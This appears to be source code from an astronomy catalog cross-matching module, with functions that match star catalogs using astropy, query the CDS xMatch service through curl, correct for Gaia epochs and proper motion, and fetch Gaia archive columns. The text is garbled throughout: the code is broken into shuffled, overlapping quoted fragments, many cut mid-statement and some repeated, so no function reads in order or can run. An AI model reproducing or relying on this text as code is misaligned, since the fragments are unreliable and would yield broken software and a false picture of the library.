index[0] is cat index of", "'DEC' keywords (see below) xcat= ('vizier:I/350/gaiaedr3') name of the catalog", "posfile: if cnt == 0: cnt+= 1 continue if cnt", "- Account for non-zero epoch difference - Bovy (UofT) \"\"\"", "level's match if we don't already know that we should", "numpy.ones(len(cat2)) * -1. idx = numpy.zeros(len(cat2), dtype=int) else: d2d =", "_ERASESTR def xmatch(cat1,cat2,maxdist=2, colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec', swap=False, col_field=None): \"\"\" NAME:", "'all': raise NotImplementedError(\"selection='all' CDS cross-match not currently implemented\") if epoch", "currently implemented\") if epoch is None: if 'ref_epoch' in cat.dtype.fields:", "matching objects, angular separation between matching objects) HISTORY: 2016-09-12 -", "# loop over the class idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique]", "returning just the default returned by the CDS xMatch instead...\")", "return (m2,m1,d2d[mindx]) else: return (m1,m2,d2d[mindx]) def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC', selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec', savefilename=None,gaia_all_columns=False): \"\"\"", "double # get around this by squeezing precision from int64", "- Bovy (UofT) \"\"\" if epoch is None: if 'ref_epoch'", "2**len(runs) if nruns >= nruns_necessary: # Only run this level's", "dtype_list[dtype_list.index(('source_id', numpy.float64))] = ('source_id', numpy.uint64) return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99,", "stdout=result) except subprocess.CalledProcessError: os.remove(posfilename) if os.path.exists(resultfilename): result.close() os.remove(resultfilename) result.close() return", "dra[numpy.isnan(cat2[colpmRA2])]= 0. ddec[numpy.isnan(cat2[colpmDec2])]= 0. else: dra= 0. ddec= 0. mc1=", "used when epochs are different] colpmDec2= ('pmdec') name of the", "max to reduce workload to just get the column name", "nruns_necessary def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat): # Send to CDS for matching result=", "'a': continue resultfile.write(line) # Remove intermediate files os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1)", "the CDS xMatch instead...\") else: ma.rename_column('mra','RA') ma.rename_column('mdec','DEC') finally: os.remove(xmlfilename) #", "else: posfile2.write(line) # Run each sys.stdout.write('\\r'+\"Working on CDS xMatch batch", "with open(resultfilename2,'r') as resultfile2: for line in resultfile2: if line[0]", "as posfile: posfile1.write(posfile.readline()) with open(posfilename2,'w') as posfile2: with open(posfilename,'r') as", "if selection != 'all': selection= 'best' if selection == 'all':", "the first row max to reduce workload to just get", "to be using a Gaia catalog, but are not setting", "filtering out all neg ones which are untouched mindx= ((d2d", "cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC', selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec', savefilename=None,gaia_all_columns=False): \"\"\" NAME: cds PURPOSE: Cross-match against a", "d2d = numpy.ones(len(cat1)) * -1. idx = numpy.zeros(len(cat1), dtype=int) for", "name of the tag in cat with the declination selection=", "for Gaia epoch 2015 - Bovy (UofT) 2019-07-07 - add", "cat2 (assumed to be ICRS) epoch2= (2000.) epoch of the", "Written - Bovy (UofT) 2016-09-21 - Account for Gaia epoch", "of the hierarchy we are running runs= ''.join([str(int(r)-1) for r", "the tag in cat2 with the right ascension in degree", "except 'source_id' being int64 dtype_list = [('{}'.format(i), numpy.float64) for i", "acoords from astropy.table import Table from astropy import units as", "unique] = temp_d2d d2d = d2d * temp_d2d.unit # make", "cat2[col_field] except KeyError: # python 2/3 format string raise KeyError(\"'%s'", "declination selection= ('best') select either all matches or the best", "Run each sys.stdout.write('\\r'+\"Working on CDS xMatch batch {} / {}", "dtype=int) for unique in uniques: # loop over the class", "name of the tag in cat2 with the right ascension", "raise NotImplementedError(\"selection='all' CDS cross-match not currently implemented\") # Write positions", "those that match, indices into cat of matching sources: index[0]", "(False) if False, find closest matches in cat2 for each", "cat.dtype.fields: if 'designation' not in cat.dtype.fields: # Assume this is", "to get both catalogs at the same time dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\ /3600000.*depoch", "not None: try: # check if the field actually exists", "ICRS; includes cos(Dec)) [only used when epoch != 2000.] colpmDec=", "keywords (see below) xcat= ('vizier:I/350/gaiaedr3') name of the catalog to", "(m2,m1,d2d[mindx]) else: return (m1,m2,d2d[mindx]) def cds(cat,xcat='vizier:I/350/gaiaedr3',maxdist=2,colRA='RA',colDec='DEC', selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec', savefilename=None,gaia_all_columns=False): \"\"\" NAME:", "resultfilename1= resultfilename+'.1' resultfilename2= resultfilename+'.2' # Figure out which of the", "the tag in cat1 with the right ascension in degree", "from int64 on source_id as source_id is always integer anyway", "_check_epoch(cat1,epoch1) _check_epoch(cat2,epoch2) depoch= epoch2-epoch1 if numpy.any(depoch != 0.): # Use", "None: if 'ref_epoch' in cat.dtype.fields: epoch= cat['ref_epoch'] else: epoch= 2000.", "one to indicate those indices untouch will be noticed at", "os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2) return nruns_necessary def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat): # Send", "1 continue if cnt < num_lines//2: posfile1.write(line) cnt+= 1 #", "if None, simply cross-match on RA and Dec; if a", "numpy.unique(cat1[col_field]) if swap: # times neg one to indicate those", "when epochs are different] swap= (False) if False, find closest", "either all matches or the best match according to CDS", "of matching objects, index into cat2 of matching objects, angular", "'-F','cat2=%s' % xcat, 'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'], stdout=result) except subprocess.CalledProcessError: os.remove(posfilename) if os.path.exists(resultfilename):", "in posfilename.split('csv.')[-1].split('.')]) except ValueError: runs= '' nruns= 2**len(runs) if nruns", "'gaia2': table_identifier = 'gaiadr2' try: job= Gaia.launch_job_async( \"\"\"select g.*, m.RA", "((d2d < maxdist*u.arcsec) & (0.*u.arcsec <= d2d)) m1= m1[mindx] m2=", "- Account for Gaia epoch 2015 - Bovy (UofT) 2018-05-08", "!= 'all': selection= 'best' if selection == 'all': raise NotImplementedError(\"selection='all'", "else: epoch= 2000. _check_epoch(cat,epoch) depoch= epoch-2000. if numpy.any(depoch != 0.):", "not exist in both catalog\" % col_field) uniques = numpy.unique(cat1[col_field])", "else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) if selection != 'all': selection=", "# Write positions posfilename= tempfile.mktemp('.csv',dir=os.getcwd()) resultfilename= tempfile.mktemp('.csv',dir=os.getcwd()) with open(posfilename,'w') as", "where a class only exists in one but not the", "numpy.zeros(len(cat1), dtype=int) for unique in uniques: # loop over the", "finally we have an unit on d2d array s.t. \"<\"", "with open(posfilename1,'a') as posfile1: with open(posfilename2,'a') as posfile2: for line", "distance in arcsec colRA= ('RA') name of the tag in", "number of objects with open(posfilename,'r') as posfile: num_lines= sum(1 for", "a class only exists in one but not the other", "curl interface INPUT: cat - a catalog to cross match,", "sure finally we have an unit on d2d array s.t.", "<= d2d)) m1= m1[mindx] m2= idx[mindx] if swap: return (m2,m1,d2d[mindx])", "in declination in degree in cat2 (assumed to be ICRS)", "right ascension in degree in cat (assumed to be ICRS;", "catalog to cross match, requires 'RA' and 'DEC' keywords (see", "data = numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, max_rows=1, dtype='float64') #", "column name to_list = list(data.dtype.names) # construct a list where", "resultfile2: if line[0] == 'a': continue resultfile.write(line) # Remove intermediate", "this is the time-out failure pass else: return nruns #", "the hierarchy we are running runs= ''.join([str(int(r)-1) for r in", "to be ICRS) [only used when epoch != 2000.] gaia_all_columns=", "Only run this level's match if we don't already know", "as acoords from astropy.table import Table from astropy import units", "import units as u from ..load.download import _ERASESTR def xmatch(cat1,cat2,maxdist=2,", "cross-match tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T, names=('source_id','RA','DEC'), dtype=('int64','float64','float64')) xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd()) tab.write(xmlfilename,format='votable') #get the", "2**len(runs) thisrun1= 1+int(runs,2) thisrun2= 1+int(''.join([str(int(r)-1) for r in posfilename2.split('csv.')[-1].split('.')]),2) #", "return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype='float128') def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best', epoch=None,colpmRA='pmra',colpmDec='pmdec',):", "appear to be using a Gaia catalog, but are not", "2/3 format string raise KeyError(\"'%s' does not exist in both", "{} / {} ...\\r\"\\ .format(thisrun1,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename1,posfilename1, maxdist,selection,xcat, nruns_necessary=nruns_necessary)", "2000.] OUTPUT: Array indices into cat of xcat entries: index[0]", "in cat1 with the right ascension in degree in cat1", "name of the tag in cat2 with the declination in", "xmlfilename= tempfile.mktemp('.xml',dir=os.getcwd()) tab.write(xmlfilename,format='votable') #get the data release.... table_identifier = xcat.split('/')[-1]", "this level's match if we don't already know that we", "ICRS) epoch2= (2000.) epoch of the coordinates in cat2 colpmRA2=", "catalog cat2 - Second catalog maxdist= (2) maximum distance in", "as m on m.source_id = g.source_id\"\"\" % table_identifier, upload_resource=xmlfilename, upload_table_name=\"my_table\")", "table_identifier, upload_resource=xmlfilename, upload_table_name=\"my_table\") ma= job.get_results() except: print(\"gaia_tools.xmath.cds failed to retrieve", "cds_load(filename): if WIN32: # windows do not have float128, but", "to this path; can match back using cds_matchback OUTPUT: (xcat", "each sys.stdout.write('\\r'+\"Working on CDS xMatch batch {} / {} ...\\r\"\\", "colDec= ('DEC') name of the tag in cat with the", "True elif 'Gaia DR2' in cat['designation'][0].decode('utf-8'): if numpy.any(numpy.fabs(epoch-2015.5) > 0.01):", "False do the opposite (important when one of the catalogs", "for those that match, indices into cat of matching sources:", "numpy.arange(len(cat1)) # to make sure filtering out all neg ones", "motion dra[numpy.isnan(cat2[colpmRA2])]= 0. ddec[numpy.isnan(cat2[colpmDec2])]= 0. else: dra= 0. ddec= 0.", "'designation' not in cat.dtype.fields: # Assume this is DR1 if", "Gaia Archive, which may or may not work... savefilename= (None)", "file with the XML output of the cross-match tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T,", "add additional catalog field matching - Leung (UofT) \"\"\" if", "motion in right ascension in degree in cat (assumed to", "else: return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype='float128') def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best',", "proper motion dra[numpy.isnan(cat2[colpmRA2])]= 0. ddec[numpy.isnan(cat2[colpmDec2])]= 0. else: dra= 0. ddec=", "exist in both catalog\" % col_field) uniques = numpy.unique(cat1[col_field]) if", "based on RC catalog code - Bovy (UofT) 2016-09-21 -", "= temp_d2d d2d = d2d * temp_d2d.unit # make sure", "epoch= 2000. _check_epoch(cat,epoch) depoch= epoch-2000. if numpy.any(depoch != 0.): #", "Account for non-zero epoch difference - Bovy (UofT) \"\"\" if", "at the same time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat[colpmDec]/3600000.*depoch # Don't", "cat colpmRA= ('pmra') name of the tag in cat with", "if cnt < num_lines//2: posfile1.write(line) cnt+= 1 # Can stop", "'-F','colRA1=RA', '-F','colDec1=DEC', '-F','cat2=%s' % xcat, 'http://cdsxmatch.u-strasbg.fr/xmatch/api/v1/sync'], stdout=result) except subprocess.CalledProcessError: os.remove(posfilename)", "open(posfilename1,'w') as posfile1: with open(posfilename,'r') as posfile: posfile1.write(posfile.readline()) with open(posfilename2,'w')", "cat1/cat2 cat1[col_field] cat2[col_field] except KeyError: # python 2/3 format string", "cat index of xcat[0]) HISTORY: 2016-09-12 - Written based on", "< num_lines//2: posfile1.write(line) cnt+= 1 # Can stop counting once", "from astropy.table import Table from astropy import units as u", "(index into cat1 of matching objects, index into cat2 of", "(assumed to be ICRS) epoch2= (2000.) epoch of the coordinates", "colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec', swap=False, col_field=None): \"\"\" NAME: xmatch PURPOSE: cross-match two", "matched catalog returned by xmatch.cds colRA= ('RA') name of the", "2016-09-12 - Written - Bovy (UofT) 2018-05-04 - Account for", "2015. (DR1) or 2015.5 (DR2), which may lead to incorrect", "posfile1.write(line) cnt+= 1 # Can stop counting once this if", "name of the tag in cat with the proper motion", "INPUT: cat - a catalog to cross match, requires 'RA'", "continue resultfile.write(line) # Remove intermediate files os.remove(posfilename1) os.remove(posfilename2) os.remove(resultfilename1) os.remove(resultfilename2)", "epoch2= (2000.) epoch of the coordinates in cat2 colpmRA2= ('pmra')", "u.degree),frame='icrs') idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) mindx= d2d < 1e-5*u.arcsec return idx[mindx]", "cat of matching sources: index[0] is cat index of xcat[0])", "first read everything as fp64 and then convert source_id to", "colDec2= ('DEC') name of the tag in cat2 with the", "0. ddec[numpy.isnan(cat2[colpmDec2])]= 0. else: dra= 0. ddec= 0. mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1],", "RA and Dec; if a string, then cross-match on RA", "cross-match not currently implemented\") if epoch is None: if 'ref_epoch'", "('pmdec') name of the tag in cat with the proper", "table_identifier = 'gaiadr2' try: job= Gaia.launch_job_async( \"\"\"select g.*, m.RA as", "Gaia epoch 2015 - Bovy (UofT) 2019-07-07 - add additional", "the CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2' or", "ma= job.get_results() except: print(\"gaia_tools.xmath.cds failed to retrieve all gaia columns,", "stop counting once this if is done else: posfile2.write(line) #", "catalog from xmatch.cds back to the original catalog INPUT cat", "maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+\"Working on CDS xMatch batch {} / {}", "try: # check if the field actually exists in both", "all matches or the best match according to CDS (see", "import shutil import subprocess import tempfile import warnings WIN32= platform.system()", "be ICRS; includes cos(Dec)) [only used when epochs are different]", "i in to_list] dtype_list[dtype_list.index(('source_id', numpy.float64))] = ('source_id', numpy.uint64) return numpy.genfromtxt(filename,", "numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype='float128') def cds_matchback(cat,xcat,colRA='RA',colDec='DEC',selection='best', epoch=None,colpmRA='pmra',colpmDec='pmdec',): \"\"\"", "matches in cat2 for each cat1 source, if False do", "using cds_matchback OUTPUT: (xcat entries for those that match, indices", "against *original* coords, # not matched coords in CDS mc1=", "Figure out which of the hierarchy we are running try:", "and want *all* columns returned; this runs a query at", "of matching sources: index[0] is cat index of xcat[0]) HISTORY:", "float128, but source_id is double # get around this by", "os.remove(resultfilename1) os.remove(resultfilename2) return nruns_necessary def _cds_basic_match(resultfilename,posfilename,maxdist,selection,xcat): # Send to CDS", "out which of the hierarchy we are running try: runs=", "== unique] = idx_1[temp_idx] d2d[cat2[col_field] == unique] = temp_d2d else:", "NAME: xmatch PURPOSE: cross-match two catalogs (incl. proper motion in", "may not work... savefilename= (None) if set, save the output", "for cross-matching catalogs import csv import sys import os import", "on d2d array s.t. \"<\" operation can complete else: if", "= ('source_id', numpy.uint64) return numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, dtype=dtype_list)", "not in cat.dtype.fields: # Assume this is DR1 if numpy.any(numpy.fabs(epoch-2015.)", "# xMatch failed because of time-out, split posfilename1= posfilename+'.1' posfilename2=", "be ICRS) epoch2= (2000.) epoch of the coordinates in cat2", "0.): # Use proper motion to get both catalogs at", "cat index of xcat[0] HISTORY: 2016-09-12 - Written - Bovy", "if cnt == 0: cnt+= 1 continue if cnt <", "implemented\") # Write positions posfilename= tempfile.mktemp('.csv',dir=os.getcwd()) resultfilename= tempfile.mktemp('.csv',dir=os.getcwd()) with open(posfilename,'w')", "or may not work... savefilename= (None) if set, save the", "cat2 - Second catalog maxdist= (2) maximum distance in arcsec", "in cat1 (assumed to be ICRS) epoch1= (2000.) epoch of", "1+int(runs,2) thisrun2= 1+int(''.join([str(int(r)-1) for r in posfilename2.split('csv.')[-1].split('.')]),2) # Count the", "g.*, m.RA as mRA, m.DEC as mDEC from %s.gaia_source as", "col_field is not None: try: # check if the field", "source_id as source_id is always integer anyway # first read", "in both cat1/cat2 cat1[col_field] cat2[col_field] except KeyError: # python 2/3", "\"\"\"select g.*, m.RA as mRA, m.DEC as mDEC from %s.gaia_source", "precision data = numpy.genfromtxt(filename, delimiter=',', skip_header=0, filling_values=-9999.99, names=True, max_rows=1, dtype='float64')", "/ {} ...\\r\"\\ .format(thisrun2,nruns)) sys.stdout.flush() nruns_necessary= _cds_match_batched(resultfilename2,posfilename2, maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+_ERASESTR+'\\r')", "runs= ''.join([str(int(r)-1) for r in posfilename.split('csv.')[-1].split('.')]) except ValueError: runs= ''", "dra=cat2[colpmRA2]/numpy.cos(cat2[colDec2]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat2[colpmDec2]/3600000.*depoch # Don't shift objects with non-existing", "to not fail\"\"\" # Figure out which of the hierarchy", "by the string OUTPUT: (index into cat1 of matching objects,", "csvfile: wr= csv.writer(csvfile,delimiter=',',quoting=csv.QUOTE_MINIMAL) wr.writerow(['RA','DEC']) for ii in range(len(cat)): wr.writerow([(cat[ii][colRA]-dra[ii]+360.) %", "depoch= epoch2-epoch1 if numpy.any(depoch != 0.): # Use proper motion", "check if the field actually exists in both cat1/cat2 cat1[col_field]", "are not setting the epoch to 2015. (DR1) or 2015.5", "once this if is done else: posfile2.write(line) # Run each", "< 1e-5*u.arcsec return idx[mindx] def _check_epoch(cat,epoch): warn_about_epoch= False if 'ref_epoch'", "additional matching in the data tag specified by the string", "in one but not the other continue if swap: temp_idx,", "xcat.split('/')[-1] if table_identifier == 'gaia2': table_identifier = 'gaiadr2' try: job=", "in degree in cat2 (assumed to be ICRS; includes cos(Dec))", "('DEC') name of the tag in cat with the declination", "in cat2 with the proper motion in declination in degree", "resultfilename+'.2' # Figure out which of the hierarchy we are", "idx_2 = numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique] if idx_1.shape[0] == 0 or", "m.RA as mRA, m.DEC as mDEC from %s.gaia_source as g", "selection='best',epoch=None,colpmRA='pmra',colpmDec='pmdec', savefilename=None,gaia_all_columns=False): \"\"\" NAME: cds PURPOSE: Cross-match against a catalog", "selection == 'all': raise NotImplementedError(\"selection='all' CDS cross-match not currently implemented\")", "try: runs= ''.join([str(int(r)-1) for r in posfilename.split('csv.')[-1].split('.')]) except ValueError: runs=", "XML output of the cross-match tab= Table(numpy.array([ma['source_id'],ma['RA'],ma['DEC']]).T, names=('source_id','RA','DEC'), dtype=('int64','float64','float64')) xmlfilename=", "on source_id as source_id is always integer anyway # first", "catalog code - Bovy (UofT) 2016-09-21 - Account for Gaia", "astropy.table import Table from astropy import units as u from", "m1= m1[mindx] m2= idx[mindx] if swap: return (m2,m1,d2d[mindx]) else: return", "unit=(u.degree, u.degree),frame='icrs') idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) mindx= d2d < 1e-5*u.arcsec return", "subprocess.CalledProcessError: os.remove(posfilename) if os.path.exists(resultfilename): result.close() os.remove(resultfilename) result.close() return None def", "warn_about_epoch: warnings.warn(\"You appear to be using a Gaia catalog, but", "fp64 except 'source_id' being int64 dtype_list = [('{}'.format(i), numpy.float64) for", "objects with open(posfilename,'r') as posfile: num_lines= sum(1 for line in", "unique in uniques: # loop over the class idx_1 =", "maxdist,selection,xcat, nruns_necessary=nruns_necessary) sys.stdout.write('\\r'+_ERASESTR+'\\r') sys.stdout.flush() # Combine results with open(resultfilename,'w') as", "u.degree),frame='icrs') mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'], unit=(u.degree, u.degree),frame='icrs') idx,d2d,d3d = mc2.match_to_catalog_sky(mc1) mindx= d2d", "catalogs at the same time dra=cat[colpmRA]/numpy.cos(cat[colDec]/180.*numpy.pi)\\ /3600000.*depoch ddec= cat[colpmDec]/3600000.*depoch #", "subprocess.check_call(['curl', '-X','POST', '-F','request=xmatch', '-F','distMaxArcsec=%i' % maxdist, '-F','selection=%s' % selection, '-F','RESPONSEFORMAT=csv',", "the output from CDS to this path; can match back", "= numpy.zeros(len(cat2), dtype=int) else: d2d = numpy.ones(len(cat1)) * -1. idx", "catalog\" % col_field) uniques = numpy.unique(cat1[col_field]) if swap: # times", "of the tag in cat with the declination selection= ('best')", "Bovy (UofT) 2018-05-04 - Account for non-zero epoch difference -", "xcat= ('vizier:I/350/gaiaedr3') name of the catalog to cross-match against, in", "xMatch instead...\") else: ma.rename_column('mra','RA') ma.rename_column('mdec','DEC') finally: os.remove(xmlfilename) # Remove temporary", "max_rows=1, dtype='float64') # only read the first row max to", "back to the original catalog mai= cds_matchback(cat,ma,colRA=colRA,colDec=colDec,epoch=epoch, colpmRA=colpmRA,colpmDec=colpmDec) return (ma,mai)", "to cross match, requires 'RA' and 'DEC' keywords (see below)", "running try: runs= ''.join([str(int(r)-1) for r in posfilename.split('csv.')[-1].split('.')]) except ValueError:", "distance in arcsec colRA1= ('RA') name of the tag in", "at the Gaia Archive, which may or may not work...", "sys import os import os.path import platform import shutil import", "'Windows' import numpy import astropy.coordinates as acoords from astropy.table import", "d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 = numpy.arange(len(cat1)) idx[cat1[col_field] == unique] =", "PURPOSE: cross-match two catalogs (incl. proper motion in cat2 if", "= temp_d2d else: temp_idx, temp_d2d, d3d = mc1[idx_1].match_to_catalog_sky(mc2[idx_2]) m1 =", "else: return nruns # xMatch failed because of time-out, split", "with the proper motion in right ascension in degree in", "both catalog\" % col_field) uniques = numpy.unique(cat1[col_field]) if swap: #", "right ascension colDec= ('DEC') name of the tag in cat", "with open(posfilename2,'a') as posfile2: for line in posfile: if cnt", "as u from ..load.download import _ERASESTR def xmatch(cat1,cat2,maxdist=2, colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None,", "the number of objects with open(posfilename,'r') as posfile: num_lines= sum(1", "done else: posfile2.write(line) # Run each sys.stdout.write('\\r'+\"Working on CDS xMatch", "in cat1 colRA2= ('RA') name of the tag in cat2", "of the coordinates in cat colpmRA= ('pmra') name of the", "colpmDec= ('pmdec') name of the tag in cat with the", ">= nruns_necessary: # Only run this level's match if we", "in degree in cat (assumed to be ICRS; includes cos(Dec))", "range(len(cat)): wr.writerow([(cat[ii][colRA]-dra[ii]+360.) % 360., cat[ii][colDec]]-ddec[ii]) _cds_match_batched(resultfilename,posfilename,maxdist,selection,xcat) # Directly match on", "0. else: dra= numpy.zeros(len(cat)) ddec= numpy.zeros(len(cat)) # xmatch to v.", "try: ma= cds_load(resultfilename) except ValueError: # Assume this is the", "depoch= epoch-2000. if numpy.any(depoch != 0.): # Use proper motion", "numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique] if idx_1.shape[0] == 0 or idx_2.shape[0] ==", "[only used when epoch != 2000.] OUTPUT: Array indices into", "gaia_all_columns - Bovy (UofT) \"\"\" if epoch is None: if", "('pmra') name of the tag in cat with the proper", "ICRS) epoch1= (2000.) epoch of the coordinates in cat1 colRA2=", "the curl interface INPUT: cat - a catalog to cross", "('RA') name of the tag in cat1 with the right", "def cds_load(filename): if WIN32: # windows do not have float128,", "not setting the epoch to 2015. (DR1) or 2015.5 (DR2),", "large matches, because of a time-out, so we recursively split", "format string raise KeyError(\"'%s' does not exist in both catalog\"", "this if is done else: posfile2.write(line) # Run each sys.stdout.write('\\r'+\"Working", "RA and Dec with additional matching in the data tag", "raise KeyError(\"'%s' does not exist in both catalog\" % col_field)", "class idx_1 = numpy.arange(cat1[colRA1].shape[0])[cat1[col_field] == unique] idx_2 = numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] ==", "(UofT) 2018-05-04 - Account for non-zero epoch difference - Bovy", "gaia_all_columns: from astroquery.gaia import Gaia # Write another temporary file", "xcat entries: index[0] is cat index of xcat[0] HISTORY: 2016-09-12", "not the other continue if swap: temp_idx, temp_d2d, d3d =", "# first read everything as fp64 and then convert source_id", "the column name to_list = list(data.dtype.names) # construct a list", "precision from int64 on source_id as source_id is always integer", "(UofT) \"\"\" if selection != 'all': selection= 'best' if selection", "= numpy.ones(len(cat2)) * -1. idx = numpy.zeros(len(cat2), dtype=int) else: d2d", "fails for large matches, because of a time-out, so we", "string OUTPUT: (index into cat1 of matching objects, index into", "% selection, '-F','RESPONSEFORMAT=csv', '-F','cat1=@%s' % os.path.basename(posfilename), '-F','colRA1=RA', '-F','colDec1=DEC', '-F','cat2=%s' %", "enough to not fail\"\"\" # Figure out which of the", "where everything is fp64 except 'source_id' being int64 dtype_list =", "# Assume this is DR1 if numpy.any(numpy.fabs(epoch-2015.) > 0.01): warn_about_epoch=", "are different] swap= (False) if False, find closest matches in", "DR1 if numpy.any(numpy.fabs(epoch-2015.) > 0.01): warn_about_epoch= True elif 'Gaia DR2'", "Bovy (UofT) \"\"\" if selection != 'all': selection= 'best' if", "(2) maximum distance in arcsec colRA= ('RA') name of the", "= numpy.arange(cat2[colRA2].shape[0])[cat2[col_field] == unique] if idx_1.shape[0] == 0 or idx_2.shape[0]", "Match a matched catalog from xmatch.cds back to the original", "epoch 2015 - Bovy (UofT) 2019-07-07 - add additional catalog", "cat2 if epochs are different) INPUT: cat1 - First catalog", "idx_2[temp_idx] d2d[cat1[col_field] == unique] = temp_d2d d2d = d2d *", "from ..load.download import _ERASESTR def xmatch(cat1,cat2,maxdist=2, colRA1='RA',colDec1='DEC',epoch1=None, colRA2='RA',colDec2='DEC',epoch2=None, colpmRA2='pmra',colpmDec2='pmdec', swap=False,", "just the default returned by the CDS xMatch instead...\") else:", "used when epoch != 2000.] colpmDec= ('pmdec') name of the", "be ICRS) epoch1= (2000.) epoch of the coordinates in cat1", "None: try: # check if the field actually exists in", "with open(posfilename,'r') as posfile: num_lines= sum(1 for line in posfile)", "we are running try: runs= ''.join([str(int(r)-1) for r in posfilename.split('csv.')[-1].split('.')])", "motion in declination in degree in cat (assumed to be", "the hierarchy we are running try: runs= ''.join([str(int(r)-1) for r", "cat2 (assumed to be ICRS) colDec2= ('DEC') name of the", "run this level's match if we don't already know that", "s.t. \"<\" operation can complete else: if swap: idx,d2d,d3d =", "ddec[numpy.isnan(cat2[colpmDec2])]= 0. else: dra= 0. ddec= 0. mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree,", "or the best match according to CDS (see 'selection' at", "arcsec colRA1= ('RA') name of the tag in cat1 with", "2015 - Bovy (UofT) 2018-05-08 - Added gaia_all_columns - Bovy", "a format understood by the CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html;", "tempfile import warnings WIN32= platform.system() == 'Windows' import numpy import", "tag in cat1 with the declination in degree in cat1", "(UofT) \"\"\" if epoch1 is None: if 'ref_epoch' in cat1.dtype.fields:", "CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch= (2000.) epoch of the", "tag in cat with the proper motion in declination in", "'ref_epoch' in cat.dtype.fields: if 'designation' not in cat.dtype.fields: # Assume", "from astroquery.gaia import Gaia # Write another temporary file with", "continue if cnt < num_lines//2: posfile1.write(line) cnt+= 1 # Can", "(incl. proper motion in cat2 if epochs are different) INPUT:", "- Leung (UofT) \"\"\" if epoch1 is None: if 'ref_epoch'", "RC catalog code - Bovy (UofT) 2016-09-21 - Account for", "savefilename is None: os.remove(resultfilename) else: shutil.move(resultfilename,savefilename) # Match back to", "diff., because match is against *original* coords, # not matched", "resultfile1: for line in resultfile1: resultfile.write(line) with open(resultfilename2,'r') as resultfile2:", "sources: index[0] is cat index of xcat[0]) HISTORY: 2016-09-12 -", "Cross-match against a catalog in the CDS archive using the", "- Bovy (UofT) 2016-09-21 - Account for Gaia epoch 2015", "by the CDS cross-matching service (see http://cdsxmatch.u-strasbg.fr/xmatch/doc/available-tables.html; things like 'vizier:Tycho2'", "matched catalog from xmatch.cds back to the original catalog INPUT", "out d2d = numpy.ones(len(cat2)) * -1. idx = numpy.zeros(len(cat2), dtype=int)", "only exists in one but not the other continue if", "to CDS (see 'selection' at http://cdsxmatch.u-strasbg.fr/xmatch/doc/API-calls.html) epoch= (2000.) epoch of", "# Directly match on input RA ma= cds_load(resultfilename) if gaia_all_columns:", "False, find closest matches in cat2 for each cat1 source,", "- add additional catalog field matching - Leung (UofT) \"\"\"", "half cnt= 0 with open(posfilename,'r') as posfile: with open(posfilename1,'a') as", "be using a Gaia catalog, but are not setting the", "coords in CDS mc1= acoords.SkyCoord(cat[colRA]-dra,cat[colDec]-ddec, unit=(u.degree, u.degree),frame='icrs') mc2= acoords.SkyCoord(xcat['RA'],xcat['DEC'], unit=(u.degree,", "cat1 - First catalog cat2 - Second catalog maxdist= (2)", "catalogs has duplicates) col_field= (None) if None, simply cross-match on", "you are matching against Gaia DR2 and want *all* columns", "cos(Dec)) [only used when epoch != 2000.] colpmDec= ('pmdec') name", "of the tag in cat2 with the right ascension in", "col_field) uniques = numpy.unique(cat1[col_field]) if swap: # times neg one", "catalog to cross-match against, in a format understood by the", "ValueError: runs= '' nruns= 2**len(runs) if nruns >= nruns_necessary: #", "else: dra= 0. ddec= 0. mc1= acoords.SkyCoord(cat1[colRA1],cat1[colDec1], unit=(u.degree, u.degree),frame='icrs') mc2=", "instead...\") else: ma.rename_column('mra','RA') ma.rename_column('mdec','DEC') 